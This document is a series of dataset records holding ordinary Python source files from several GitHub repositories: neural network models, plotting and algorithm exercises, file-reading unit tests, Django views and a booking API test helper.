self._init_weights()\n\n def forward(self,\n feat: \"tensor (bs, vetice_num, 256)\",\n feat_global: \"tensor (bs, 1, 256)\",\n vertices: \"tensor (bs, vetice_num, 3)\",\n face_shift_prior: \"tensor (bs, vetice_num, 18)\",\n\n ):\n \"\"\"\n Return: (bs, vertice_num, class_num)\n \"\"\"\n # concate feature\n bs, vertice_num, _ = feat.size()\n feat_face_re = feat_global.view(bs, 1, feat_global.shape[1]).repeat(1, feat.shape[1], 1).permute(0, 2, 1)\n conv1d_input = feat.permute(0, 2, 1) # (bs, fuse_ch, vertice_num)\n conv1d_out = self.conv1d_block(conv1d_input)\n\n recon = self.recon_head(conv1d_out)\n # average pooling for face prediction\n feat_face_in = torch.cat([feat_face_re, conv1d_out, vertices.permute(0, 2, 1)], dim=1)\n feat = self.face_decoder(feat_face_in)\n mask = self.mask_head(feat)\n face_shift_delta = torch.zeros((bs, vertice_num, 18)).to(feat.device)\n face_log_var = torch.zeros((bs, vertice_num, 6)).to(feat.device)\n for i, vote_head in enumerate(self.vote_head_list):\n face_vote_result = vote_head(feat, face_shift_prior[:,:,3*i:3*i+3])\n face_shift_delta[:,:,3*i:3*i+3] = face_vote_result[:,:,:3]\n face_log_var[:,:,i] = face_vote_result[:,:,3]\n\n return recon.permute(0, 2, 1), face_shift_delta, face_log_var, mask.squeeze()\n\n def _init_weights(self):\n for m in self.modules():\n if isinstance(m, (nn.Conv2d, nn.ConvTranspose2d, nn.Conv1d)):\n normal_init(m, std=0.001)\n elif isinstance(m, (_BatchNorm, nn.GroupNorm)):\n constant_init(m, 1)\n elif isinstance(m, nn.Linear):\n normal_init(m, std=0.001)\n\n\nclass VoteHead(nn.Module):\n def __init__(self):\n super(VoteHead, self).__init__()\n self.layer = nn.Sequential(\n nn.Conv1d(256 + 3, 128, 1),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n 
nn.Conv1d(128, 3 + 1, 1),\n )\n\n\n def forward(self,\n feat: \"tensor (bs, 256, vertice_num)\",\n face_shift_prior: \"tensor (bs, vertice_num, 3)\"\n ):\n \"\"\"\n Return: (bs, vertice_num, class_num)\n \"\"\"\n feat_face_in = torch.cat([feat, face_shift_prior.permute(0, 2, 1)], dim=1)\n face = self.layer(feat_face_in)\n return face.permute(0, 2, 1)\n\ndef main(argv):\n classifier_seg3D = FaceRecon()\n\n points = torch.rand(2, 1000, 3)\n import numpy as np\n obj_idh = torch.ones((2, 1))\n obj_idh[1, 0] = 5\n '''\n if obj_idh.shape[0] == 1:\n obj_idh = obj_idh.view(-1, 1).repeat(points.shape[0], 1)\n else:\n obj_idh = obj_idh.view(-1, 1)\n\n one_hot = torch.zeros(points.shape[0], 6).scatter_(1, obj_idh.cpu().long(), 1)\n '''\n recon, face, feat = classifier_seg3D(points, obj_idh)\n face = face.squeeze(0)\n t = 1\n\n\n\nif __name__ == \"__main__\":\n print(1)\n from config.config import *\n app.run(main)\n\n\n","repo_name":"lolrudy/RBP_Pose","sub_path":"network/fs_net_repo/FaceRecon.py","file_name":"FaceRecon.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"25706493550","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef f(x):\r\n x = np.radians(x)\r\n return np.exp(np.cos(x)) + np.log(np.sin(0.8 * x) ** 2 + 1) * np.cos(x)\r\n\r\ndef y(x):\r\n x = np.radians(x)\r\n return -np.log((np.cos(x) + np.sin(x)) ** 2 + 1.7) + 2\r\n\r\nx1, x2 = -240, 360\r\nxsticks = np.arange(x1 - 10, x2, 50)\r\nxsticks[0], xsticks[-1] = x1, x2\r\nxsticks = sorted(np.append(xsticks, 71))\r\nx = np.linspace(x1, x2, 10000)\r\n\r\nprint(f\"В точке x = 71о значения функции: f(x) {['=','>','<'][int(np.sign(f(71)-y(71)))]} y(x)\")\r\nprint(f\"На интервале [{x1}, {x2}] мин.значение у функции: {['','y(x)','f(x)'][int(np.sign(min(f(x))-min(y(x))))]}\")\r\nprint(f\"На интервале [{x1}, {x2}] только отрицательные значения у функции: {['f(x)' if all(f(x)<0) else 'y(x)' if all(y(x)<0) else 'нет']}\")\r\nprint(f\"На интервале [{x1}, {x2}] функции f(x) и y(x) имеют точек пересечений: {len(np.argwhere(np.diff(np.sign(f(x) - y(x)))))}\")\r\n\r\n# отображаем графики\r\nfig, ax = plt.subplots(figsize=(12, 6))\r\nplt.title(\"Графики функций\")\r\nplt.plot(x, f(x), label='f(x)')\r\nplt.plot(x, y(x), label='y(x)')\r\nax.axhline(y=0, color='k', lw=1)\r\nax.axvline(x=71, color='g', lw=1)\r\nax.set_xticks(xsticks)\r\nplt.legend()\r\nplt.grid()\r\nplt.show()","repo_name":"IgorLutoshkin/Pyton-tasks","sub_path":"2.2.3.py","file_name":"2.2.3.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14090710401","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import Conv1d, ConvTranspose1d\nfrom torch.nn.utils import weight_norm, remove_weight_norm\n\nLRELU_SLOPE = 0.1\n\n\ndef init_weights(m, mean=0.0, std=0.01):\n classname = m.__class__.__name__\n if classname.find(\"Conv\") != -1:\n m.weight.data.normal_(mean, std)\n\n\ndef get_padding(kernel_size, dilation=1):\n return int((kernel_size * dilation - dilation) / 2)\n\n\nclass ResBlock(torch.nn.Module):\n def __init__(self, h, channels, kernel_size=3, dilation=(1, 3, 5)):\n super(ResBlock, self).__init__()\n self.h = h\n self.convs1 = nn.ModuleList(\n [\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[0],\n padding=get_padding(kernel_size, dilation[0]),\n )\n ),\n weight_norm(\n Conv1d(\n 
channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[1],\n padding=get_padding(kernel_size, dilation[1]),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[2],\n padding=get_padding(kernel_size, dilation[2]),\n )\n ),\n ]\n )\n self.convs1.apply(init_weights)\n\n self.convs2 = nn.ModuleList(\n [\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=1,\n padding=get_padding(kernel_size, 1),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=1,\n padding=get_padding(kernel_size, 1),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=1,\n padding=get_padding(kernel_size, 1),\n )\n ),\n ]\n )\n self.convs2.apply(init_weights)\n\n def forward(self, x):\n for c1, c2 in zip(self.convs1, self.convs2):\n xt = F.leaky_relu(x, LRELU_SLOPE)\n xt = c1(xt)\n xt = F.leaky_relu(xt, LRELU_SLOPE)\n xt = c2(xt)\n x = xt + x\n return x\n\n def remove_weight_norm(self):\n for l in self.convs1:\n remove_weight_norm(l)\n for l in self.convs2:\n remove_weight_norm(l)\n\n\nclass Generator(torch.nn.Module):\n def __init__(self, h):\n super(Generator, self).__init__()\n self.h = h\n self.num_kernels = len(h.resblock_kernel_sizes)\n self.num_upsamples = len(h.upsample_rates)\n self.conv_pre = weight_norm(\n Conv1d(80, h.upsample_initial_channel, 7, 1, padding=3)\n )\n resblock = ResBlock\n\n self.ups = nn.ModuleList()\n for i, (u, k) in enumerate(zip(h.upsample_rates, h.upsample_kernel_sizes)):\n self.ups.append(\n weight_norm(\n ConvTranspose1d(\n h.upsample_initial_channel // (2**i),\n h.upsample_initial_channel // (2 ** (i + 1)),\n k,\n u,\n padding=(k - u) // 2,\n )\n )\n )\n\n self.resblocks = nn.ModuleList()\n for i in range(len(self.ups)):\n ch = h.upsample_initial_channel // (2 ** (i + 1))\n for j, (k, d) in enumerate(\n zip(h.resblock_kernel_sizes, h.resblock_dilation_sizes)\n ):\n self.resblocks.append(resblock(h, ch, k, d))\n\n self.conv_post = weight_norm(Conv1d(ch, 1, 7, 1, padding=3))\n self.ups.apply(init_weights)\n self.conv_post.apply(init_weights)\n\n def forward(self, x):\n x = self.conv_pre(x)\n for i in range(self.num_upsamples):\n x = F.leaky_relu(x, LRELU_SLOPE)\n x = self.ups[i](x)\n xs = None\n for j in range(self.num_kernels):\n if xs is None:\n xs = self.resblocks[i * self.num_kernels + j](x)\n else:\n xs += self.resblocks[i * self.num_kernels + j](x)\n x = xs / self.num_kernels\n x = F.leaky_relu(x)\n x = self.conv_post(x)\n x = torch.tanh(x)\n\n return x\n\n def remove_weight_norm(self):\n print(\"Removing weight norm...\")\n for l in self.ups:\n remove_weight_norm(l)\n for l in self.resblocks:\n l.remove_weight_norm()\n remove_weight_norm(self.conv_pre)\n remove_weight_norm(self.conv_post)\n","repo_name":"MiniXC/simple_hifigan","sub_path":"src/simple_hifigan/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31236307781","text":"from builtins import zip\nimport unittest\nimport os\n\nfrom gsshapy.orm.file_io import *\nfrom gsshapy.orm import ProjectFile\nfrom gsshapy.lib import db_tools as dbt\n\n\nclass TestReadMethods(unittest.TestCase):\n def setUp(self):\n # Find db directory path\n here = os.path.abspath(os.path.dirname(__file__))\n\n # Create Test DB\n sqlalchemy_url, sql_engine = dbt.init_sqlite_memory()\n\n # Create DB Sessions\n session_maker = dbt.get_sessionmaker(sqlalchemy_url, 
sql_engine)\n self.readSession = session_maker()\n self.querySession = session_maker()\n\n # Define directory of test files to read\n self.directory = os.path.join(here, 'standard')\n\n def test_project_file_read(self):\n \"\"\"\n Test ProjectFile read method\n \"\"\"\n prjR, prjQ = self._read_n_query(fileIO=ProjectFile,\n directory=self.directory,\n filename='standard.prj')\n\n # Tests\n self.assertEqual(prjR.name, prjQ.name)\n self.assertEqual(prjR.mapType, prjQ.mapType)\n\n # Retrieve Cards\n cardsR = prjR.projectCards\n cardsQ = prjQ.projectCards\n\n for cardR, cardQ in zip(cardsR, cardsQ):\n # Compare cards and values\n self.assertEqual(cardR.name, cardQ.name)\n self.assertEqual(cardR.value, cardQ.value)\n\n def test_channel_input_read(self):\n \"\"\"\n Test ChannelInputFile read method\n \"\"\"\n # Read and Query\n cifR, cifQ = self._read_n_query(fileIO=ChannelInputFile,\n directory=self.directory,\n filename='standard.cif')\n\n # Tests\n self.assertEqual(cifR, cifQ)\n\n # Check Links\n linksR = cifR.streamLinks\n linksQ = cifQ.streamLinks\n\n for linkR, linkQ in zip(linksR, linksQ):\n self.assertEqual(linkR, linkQ)\n\n # Check Nodes\n nodesR = linkR.nodes\n nodesQ = linkQ.nodes\n\n self._list_compare(nodesR, nodesQ)\n\n # Check Upstream Links\n upLinksR = linkR.upstreamLinks\n upLinksQ = linkQ.upstreamLinks\n\n self._list_compare(upLinksR, upLinksQ)\n\n # Check Weirs\n weirsR = linkR.weirs\n weirsQ = linkQ.weirs\n\n self._list_compare(weirsR, weirsQ)\n\n # Check Culverts\n culvertsR = linkR.culverts\n culvertsQ = linkQ.culverts\n\n self._list_compare(culvertsR, culvertsQ)\n\n # Check Reservoir\n resR = linkR.reservoir\n resQ = linkQ.reservoir\n\n self.assertEqual(resR, resQ)\n\n # Check Reservoir Points\n if resR is not None and resQ is not None:\n resPointsR = resR.reservoirPoints\n resPointsQ = resQ.reservoirPoints\n self._list_compare(resPointsR, resPointsQ)\n\n # Check Trapezoidal CS\n trapR = linkR.trapezoidalCS\n trapQ = linkQ.trapezoidalCS\n\n self.assertEqual(trapR, trapQ)\n\n # Check Breakpoint CS\n breakR = linkR.breakpointCS\n breakQ = linkQ.breakpointCS\n\n self.assertEqual(breakR, breakQ)\n\n # Check Break Points\n if breakR is not None and breakQ is not None:\n bpR = breakR.breakpoints\n bpQ = breakQ.breakpoints\n\n self._list_compare(bpR, bpQ)\n\n def test_map_table_file_read(self):\n \"\"\"\n Test MapTableFile read method\n \"\"\"\n # Read and Query\n cmtR, cmtQ = self._read_n_query(fileIO=MapTableFile,\n directory=self.directory,\n filename='standard.cmt')\n\n # Tests\n\n # Check Index Maps\n idxMapsR = cmtR.indexMaps\n idxMapsQ = cmtQ.indexMaps\n\n self._list_compare(idxMapsR, idxMapsQ)\n\n # Check Map Tables\n mapTablesR = cmtR.mapTables\n mapTablesQ = cmtQ.mapTables\n\n for mapTableR, mapTableQ in zip(mapTablesR, mapTablesQ):\n self.assertEqual(mapTableR, mapTableQ)\n\n\n # Check sediments\n sedsR = mapTableR.sediments\n sedsQ = mapTableQ.sediments\n\n if sedsR is not None and sedsQ is not None:\n self._list_compare(sedsR, sedsQ)\n\n # Check Values\n valsR = mapTableR.values\n valsQ = mapTableQ.values\n\n for valR, valQ in zip(valsR, valsQ):\n self.assertEqual(valR, valQ)\n\n # Check Contaminant\n contamR = valR.contaminant\n contamQ = valR.contaminant\n\n\n if contamR is not None and contamQ is not None:\n self.assertEqual(contamR, contamQ)\n\n # Check Index\n indexR = valR.index\n indexQ = valQ.index\n\n self.assertEqual(indexR, indexQ)\n\n def test_precip_file_read(self):\n \"\"\"\n Test PrecipFile read method\n \"\"\"\n gagR, gagQ = 
self._read_n_query(fileIO=PrecipFile,\n directory=self.directory,\n filename='standard.gag')\n\n # Tests\n\n def test_grid_pipe_file_read(self):\n \"\"\"\n Test GridPipeFile read method\n \"\"\"\n gpiR, gpiQ = self._read_n_query(fileIO=GridPipeFile,\n directory=self.directory,\n filename='standard.gpi')\n\n # Tests\n\n def test_grid_stream_file_read(self):\n \"\"\"\n Test GridStreamFile read method\n \"\"\"\n gstR, gstQ = self._read_n_query(fileIO=GridStreamFile,\n directory=self.directory,\n filename='standard.gst')\n\n # Tests\n\n def test_hmet_file_read(self):\n \"\"\"\n Test HmetFile read method\n \"\"\"\n hmetR, hmetQ = self._read_n_query(fileIO=HmetFile,\n directory=self.directory,\n filename='hmet_wes.hmt')\n\n # Tests\n\n def test_output_location_file_read(self):\n \"\"\"\n Test OutputLocationFile read method\n \"\"\"\n locR, locQ = self._read_n_query(fileIO=OutputLocationFile,\n directory=self.directory,\n filename='standard.ihl')\n\n # Tests\n\n def test_link_node_dataset_file_read(self):\n \"\"\"\n Test LinkNodeDatasetFile read method\n \"\"\"\n lndR, lndQ = self._read_n_query(fileIO=LinkNodeDatasetFile,\n directory=self.directory,\n filename='standard.cdp')\n\n # Tests\n\n def test_raster_map_file_read(self):\n \"\"\"\n Test RasterMapFile read method\n \"\"\"\n mapR, mapQ = self._read_n_query(fileIO=RasterMapFile,\n directory=self.directory,\n filename='standard.msk')\n\n # Tests\n\n def test_projection_file_read(self):\n \"\"\"\n Test ProjectionFile read method\n \"\"\"\n proR, proQ = self._read_n_query(fileIO=ProjectionFile,\n directory=self.directory,\n filename='standard_prj.pro')\n\n # Tests\n\n def test_replace_param_file_read(self):\n \"\"\"\n Test ReplaceParamFile read method\n \"\"\"\n repR, repQ = self._read_n_query(fileIO=ReplaceParamFile,\n directory=self.directory,\n filename='replace_param.txt')\n\n # Tests\n\n def test_replace_val_file_read(self):\n \"\"\"\n Test ReplaceValFile read method\n \"\"\"\n repR, repQ = self._read_n_query(fileIO=ReplaceValFile,\n directory=self.directory,\n filename='replace_val.txt')\n\n # Tests\n\n def test_nwsrfs_file_read(self):\n \"\"\"\n Test NwsrfsFile read method\n \"\"\"\n snwR, snwQ = self._read_n_query(fileIO=NwsrfsFile,\n directory=self.directory,\n filename='nwsrfs_elev.txt')\n\n # Tests\n\n def test_oro_gage_file_read(self):\n \"\"\"\n Test OrographicGageFile read method\n \"\"\"\n snwR, snwQ = self._read_n_query(fileIO=OrographicGageFile,\n directory=self.directory,\n filename='oro_gages.txt')\n\n # Tests\n\n def test_storm_pipe_network_file_read(self):\n \"\"\"\n Test StormPipeNetworkFile read method\n \"\"\"\n spnR, spnQ = self._read_n_query(fileIO=StormPipeNetworkFile,\n directory=self.directory,\n filename='standard.spn')\n\n # Tests\n\n def test_time_series_file_read(self):\n \"\"\"\n Test TimeSeriesFile read method\n \"\"\"\n timR, timQ = self._read_n_query(fileIO=TimeSeriesFile,\n directory=self.directory,\n filename='standard.ohl')\n\n # Tests\n dfR = timR.as_dataframe()\n dfQ = timQ.as_dataframe()\n assert dfR.equals(dfQ)\n assert len(dfR.index) == 10\n self.assertAlmostEqual(dfR.iloc[7, 1], 0.016869)\n self.assertAlmostEqual(dfR.index[7], 2002.42440068)\n\n def test_evt_yml_file_read(self):\n \"\"\"\n Test ProjectFileEventManager read method\n \"\"\"\n dir_list = ('run_2014_to_2017', 'run_2015_to_2017',\n 'run_2016_to_2017')\n for subdir in dir_list:\n try:\n os.mkdir(os.path.join(self.directory, subdir))\n except OSError:\n pass\n\n ymlR, ymlQ = self._read_n_query(fileIO=ProjectFileEventManager,\n 
directory=self.directory,\n filename='testyml.yml')\n\n # Tests\n assert ymlR.events.count() == 3\n a = ymlR.events.filter_by(subfolder='run_2015_to_2017').one()\n\n # cleanup\n for subdir in dir_list:\n try:\n os.rmdir(os.path.join(self.directory, subdir))\n except OSError:\n pass\n\n def test_evt_yml_file_read_error(self):\n \"\"\"\n Test ProjectFileEventManager read method integrity\n \"\"\"\n dir_list = ('run_2014_to_2017', 'run_2015_to_2017',\n 'run_2016_to_2017')\n for subdir in dir_list:\n try:\n os.mkdir(os.path.join(self.directory, subdir))\n except OSError:\n pass\n\n ymlR, ymlQ = self._read_n_query(fileIO=ProjectFileEventManager,\n directory=self.directory,\n filename='testyml_error.yml')\n\n # Tests\n assert ymlR.events.count() == 3\n a = ymlR.events.filter_by(subfolder='run_2015_to_2017').one()\n\n # cleanup\n for subdir in dir_list:\n try:\n os.rmdir(os.path.join(self.directory, subdir))\n except OSError:\n pass\n\n def test_evt_yml_file_read_nodir(self):\n \"\"\"\n Test ProjectFileEventManager read method without directories\n \"\"\"\n ymlR, ymlQ = self._read_n_query(fileIO=ProjectFileEventManager,\n directory=self.directory,\n filename='testyml.yml')\n\n # Tests\n assert ymlR.events.count() == 0\n\n def test_index_map_read(self):\n \"\"\"\n Test IndexMap read method\n \"\"\"\n # Instantiate GSSHAPY object for reading to database\n idxR = IndexMap(name='Soil')\n\n # Call read method\n idxR.read(directory=self.directory,\n filename='Soil.idx',\n session=self.readSession,)\n\n # Query from database\n idxQ = self.querySession.query(IndexMap).one()\n\n # Tests\n\n def test_project_file_read_all(self):\n \"\"\"\n Test ProjectFile read all method\n \"\"\"\n # Instantiate GSSHAPY ProjectFile object\n prjR = ProjectFile()\n\n # Invoke read all method\n prjR.readProject(directory=self.directory,\n projectFileName='standard.prj',\n session=self.readSession)\n\n # Query Project File\n prjQ = self.querySession.query(ProjectFile).one()\n\n # Tests\n\n def test_project_file_read_input(self):\n \"\"\"\n Test ProjectFile read input method\n \"\"\"\n # Instantiate GSSHAPY ProjectFile object\n prjR = ProjectFile()\n\n # Invoke read input method\n prjR.readInput(directory=self.directory,\n projectFileName='standard.prj',\n session=self.readSession)\n\n # Query Project File\n prjQ = self.querySession.query(ProjectFile).one()\n\n # Tests\n\n def test_project_file_read_output(self):\n \"\"\"\n Test ProjectFile read output method\n \"\"\"\n # Instantiate GSSHAPY ProjectFile object\n prjR = ProjectFile()\n\n # Invoke read output method\n prjR.readOutput(directory=self.directory,\n projectFileName='standard.prj',\n session=self.readSession)\n\n # Query Project File\n prjQ = self.querySession.query(ProjectFile).one()\n\n # Tests\n\n def _read_n_query(self, fileIO, directory, filename):\n \"\"\"\n Read to database and Query from database\n \"\"\"\n # Instantiate GSSHAPY object for reading to database\n instanceR = fileIO()\n\n # Call read method\n instanceR.read(directory=directory,\n filename=filename,\n session=self.readSession)\n\n # Query from database\n instanceQ = self.querySession.query(fileIO).one()\n\n return instanceR, instanceQ\n\n def _list_compare(self, listone, listtwo):\n for one, two in zip(listone, listtwo):\n self.assertEqual(one, two)\n\n def tearDown(self):\n self.readSession.close()\n self.querySession.close()\n\nsuite = unittest.TestLoader().loadTestsFromTestCase(TestReadMethods)\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"CI-WATER/gsshapy","sub_path":"tests/test_read.py","file_name":"test_read.py","file_ext":"py","file_size_in_byte":14709,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"21149555534","text":"class Solution:\n def maxFrequency(self, nums: List[int], k: int) -> int:\n # Time Complexity: O(N log N)\n # Space Complexity: O(N)\n\n nums.sort()\n\n prefixes = list(accumulate(nums))\n ret = 0\n\n for val in set(nums):\n start, end = bisect_left(nums, val), bisect_right(nums, val)\n freq = end - start\n\n low = 0\n high = start\n\n while low < high:\n mid = low + (high - low) // 2\n\n num_values = start - mid\n targ = val * num_values\n existing = prefixes[start - 1] - prefixes[mid - 1] if mid else prefixes[start - 1]\n\n if targ - existing > k:\n low = mid + 1\n else:\n high = mid\n\n\n ret = max(ret, freq + start - low)\n\n return ret\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/1838. Frequency of the Most Frequent Element/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"27892976816","text":"import pandas as pd\nimport numpy as np\n\ndef right_left(field, th):\n \"\"\"\n Separate geopotential field into left and right of the th line.\n\n Parameters\n ----------\n field (xr.DataArray): The geopotential field\n th: The direction (in degrees)\n\n Returns\n -------\n left, right (2 xr.DataArray): The left and right side of the geopt. field.\n \"\"\"\n if th <= 180:\n return field.where((field.az <= th) | (field.az > 180 + th)), field.where(\n (field.az > th) & (field.az <= 180 + th)\n )\n else:\n return field.where((field.az <= th) & (field.az > th - 180)), field.where(\n (field.az > th) | (field.az <= th - 180)\n )\n\n\ndef right_left_vector(z, th):\n \"\"\"\n Separate geopotential field into left and right of the th line.\n\n Parameters\n ----------\n z (xr.DataArray): The geopotential field\n th: The direction (in degrees)\n\n Returns\n -------\n left, right (2 xr.DataArray): The left and right side of the z. field.\n \"\"\"\n\n A = pd.DataFrame([list(z.az.values)] * len(z.snapshot)) # matrix of az x snapshot\n mask = np.array((A.lt(th, 0) & A.ge(th - 180, 0)) | A.ge(th + 180, 0)) # Mask in 2D (az, snapshot)\n mask = np.array([mask] * len(z.r)) # Mask in 3D (r, az, snapshot)\n mask = np.swapaxes(mask, 0, 1) # Mask in 3D (az, r, snapshot)\n R, L = z.where(mask), z.where(\n ~mask\n )\n return R, L\n\n\ndef area_weights(field):\n \"\"\"\n Computes the weights needed for the weighted mean of polar field.\n\n Parameters\n ----------\n field (xr.DataArray): The geopotential field\n\n Returns\n -------\n w (xr.DataArray): The weights corresponding to the area wrt the radius.\n \"\"\"\n δ = (field.r[1] - field.r[0]) / 2\n w = (field.r + δ) ** 2 - (field.r - δ) ** 2\n return w\n\n\ndef B(th, geopt, SH=False, names=[\"snap_z900\", \"snap_z600\"]):\n \"\"\"\n Computes the B parameter for a point, with the corresponding snapshot of geopt at 600hPa and 900hPa\n\n Parameters\n ----------\n th: The direction (in degrees)\n geopt (xr.DataSet): The snapshots at both levels\n SH (bool): Set to True if the point is in the southern hemisphere\n names: names of the 900hPa and 600hPa geopt. 
variables in geopt.\n\n    Returns\n    -------\n    B, the Hart phase space parameter for symmetry.\n    \"\"\"\n    if type(names) == str:\n        z900 = geopt[names].sel(plev=900e2, method=\"nearest\")\n        print(\"Level \" + str(z900.plev.values) + \" is taken for 900hPa\")\n        z600 = geopt[names].sel(plev=600e2, method=\"nearest\")\n        print(\"Level \" + str(z600.plev.values) + \" is taken for 600hPa\")\n    else:\n        z900 = geopt[names[0]]\n        z600 = geopt[names[1]]\n\n    ΔZ = z600 - z900\n    ΔZ_R, ΔZ_L = right_left_vector(ΔZ, th)\n    if SH:\n        h = -1\n    else:\n        h = 1\n    return h * (\n        ΔZ_R.weighted(area_weights(ΔZ_R)).mean([\"r\", \"az\"])\n        - ΔZ_L.weighted(area_weights(ΔZ_L)).mean([\"r\", \"az\"])\n    ).values\n\n\ndef B_vector(th_vec, z900, z600, lat):\n    \"\"\"\n    Computes the B parameter for a vector of points, with the corresponding snapshot of geopt at 600hPa and 900hPa\n\n    Parameters\n    ----------\n    th_vec : The theta parameter for each point\n    z900 : The z900 field for each point\n    z600 : The z600 field for each point\n    lat : The latitude of each point\n\n    Returns\n    -------\n    B, the Hart phase space parameter for symmetry.\n    \"\"\"\n    ΔZ = z600 - z900\n    ΔZ_R, ΔZ_L = right_left_vector(ΔZ, th_vec)\n    h = np.where(lat < 0, -1, 1)\n    return h * (\n        ΔZ_R.weighted(area_weights(ΔZ_R)).mean([\"az\", \"r\"])\n        - ΔZ_L.weighted(area_weights(ΔZ_L)).mean([\"az\", \"r\"])\n    )\n","repo_name":"stella-bourdin/CPyS","sub_path":"CPyS/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"70381465389","text":"def uniqueValues(aDict):\n    '''\n    aDict: a dictionary\n    '''\n    # Your code here\n    keys = aDict.keys()\n    copykeys = list(aDict.keys())\n    for item in keys:\n        tempval = aDict[item]\n        counter = 0\n        for item2 in keys:\n            if aDict[item2] == tempval:\n                counter += 1\n                if counter == 2:\n                    if item2 in copykeys:\n                        copykeys.remove(item2)\n                    if item in copykeys:\n                        copykeys.remove(item)\n\n    return(copykeys)\n\n\n\ndicky = {'vops':2, 'zips':1, 'bips':1, 'topple':5}\nprint(uniqueValues(dicky))\n","repo_name":"linkel/MITx-6.00.1x-2018","sub_path":"Midterm/adict.py","file_name":"adict.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"24180241414","text":"from django.shortcuts import render\nfrom .models import Student\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom .forms import StudentForm\n# Create your views here.\n\ndef index(requset):\n    return render(requset,'students/index.html',{\n        'students': Student.objects.all()\n    })\n\ndef view_student(requset,id):\n    student = Student.objects.get(pk=id)\n    return HttpResponseRedirect(reverse('index'))\n\ndef add(requset):\n    if requset.method == 'POST':\n        form = StudentForm(requset.POST)\n        if form.is_valid():\n            new_student_id = form.cleaned_data['student_id']\n            new_first_name = form.cleaned_data['first_name']\n            new_last_name = form.cleaned_data['last_name']\n            new_email = form.cleaned_data['email']\n            new_filed_of_study = form.cleaned_data['field_of_study']\n            new_gpa = form.cleaned_data['gpa']\n\n            new_student = Student(\n                student_id = new_student_id,\n                first_name = new_first_name,\n                last_name = new_last_name,\n                email = new_email,\n                field_of_study = new_filed_of_study,\n                gpa = new_gpa\n            )\n\n            new_student.save()\n            return render(requset,'students/add.html',{\n                'form' : StudentForm(),\n                'success' : True\n            })\n    else:\n        form = StudentForm()\n    return render(requset,'students/add.html',{\n        'form' : StudentForm()\n    })\n\n\ndef edit(requset,id):\n    if requset.method == 'POST':\n        student= Student.objects.get(pk=id)\n        form = StudentForm(requset.POST,instance=student)\n        if form.is_valid():\n            form.save()\n            return render (requset,'students/edit.html', {\n                'form' : form,\n                'success' : True\n            })\n    else:\n        student = Student.objects.get(pk=id)\n        form = StudentForm(instance=student)\n        return render (requset,'students/edit.html', {\n            'form' : form\n        })\n\n\ndef delete(requset,id):\n    if requset.method == 'POST':\n        student= Student.objects.get(pk=id)\n        student.delete()\n    return HttpResponseRedirect(reverse('index'))","repo_name":"mhdnabeel06/students_managment_system","sub_path":"student_management/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"15796573899","text":"from ibooking.app import minute_00, minute_10, minute_15, minute_45\nfrom datetime import datetime\n\nclass Book_api:\n\n    def book_add(self, client, is_login: bool=True, book_dict: dict=None) -> dict:\n        \"\"\" Create a study-room booking, initially in the waiting-for-check-in state \"\"\"\n\n        book_dict = {\n            'seat_id': 2,\n            'start_time': datetime(2023, 4, 15, 16).__str__(),\n            'end_time': datetime(2023, 4, 15, 19).__str__()\n        } if book_dict is None else book_dict\n\n        resp = client.post(\"/book/submit\", data=book_dict)\n        assert resp.status_code == 200 if is_login else resp.status_code == 401\n        return resp.json\n\n\n    def book_cancel(self, client, is_login: bool=True, book_id: int=1) -> dict:\n        \"\"\" Cancel a booking; only valid for bookings waiting for check-in, waiting to start, or in progress \"\"\"\n\n        resp = client.post(\"/book/cancel\", data={\n            'id': book_id\n        })\n        assert resp.status_code == 200 if is_login else resp.status_code == 401\n        return resp.json\n\n\n    def book_sign(self, client, is_login: bool=True, post_dict: dict=None) -> dict:\n        \"\"\" Check in for a booking; only valid for bookings waiting for check-in \"\"\"\n\n        post_dict = {\n            'id': 1,\n            'location_x': 121.51372,\n            'location_y': 31.34273\n        } if post_dict is None else post_dict\n\n        resp = client.post(\"/book/sign\", data=post_dict)\n        assert resp.status_code == 200 if is_login else resp.status_code == 401\n        return resp.json\n\n\n    def book_get_self(self, client, is_login: bool=True) -> dict:\n        \"\"\" Get all bookings related to a user \"\"\"\n\n        resp = client.get(\"/book/get\")\n        assert resp.status_code == 200 if is_login else resp.status_code == 401\n        return resp.json\n\n\n    def book_get_id(self, client, is_login: bool=True, book_id: int=1) -> dict:\n        \"\"\" Get the details of the booking with the given id \"\"\"\n\n        resp = client.get(\"/book/id\", query_string={\n            'id': book_id\n        })\n        assert resp.status_code == 200 if is_login else resp.status_code == 401\n        return resp.json\n\n\n    def book_admin_get(self, client, is_login: bool=True, 